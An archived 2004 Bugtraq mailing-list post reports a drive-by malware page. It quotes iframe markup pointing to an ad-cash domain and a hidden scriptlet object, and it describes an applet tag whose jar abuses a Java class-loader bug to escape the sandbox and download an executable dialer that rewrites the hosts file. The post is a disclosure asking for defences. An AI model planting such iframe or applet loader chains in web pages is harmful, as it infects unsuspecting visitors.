Home page logo

bugtraq logo Bugtraq mailing list archives

Strange Java Loader
From: duffbeer <duffbeer () gmx net>
Date: Thu, 30 Dec 2004 07:34:23 +0100

Hi People,

before reading this,
dont go on any of the sites
unless you are sure ;)

after decrypting some stuff, this is the source from:
<iframe src="";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>

this is the source from one of the iframes
<textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>

<script language="javascript">
<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>

the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:

this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,

so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)

cya, Stefan

Attachment: loaderadv.zip

  By Date           By Thread  

Current thread:
  • Strange Java Loader duffbeer (Dec 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]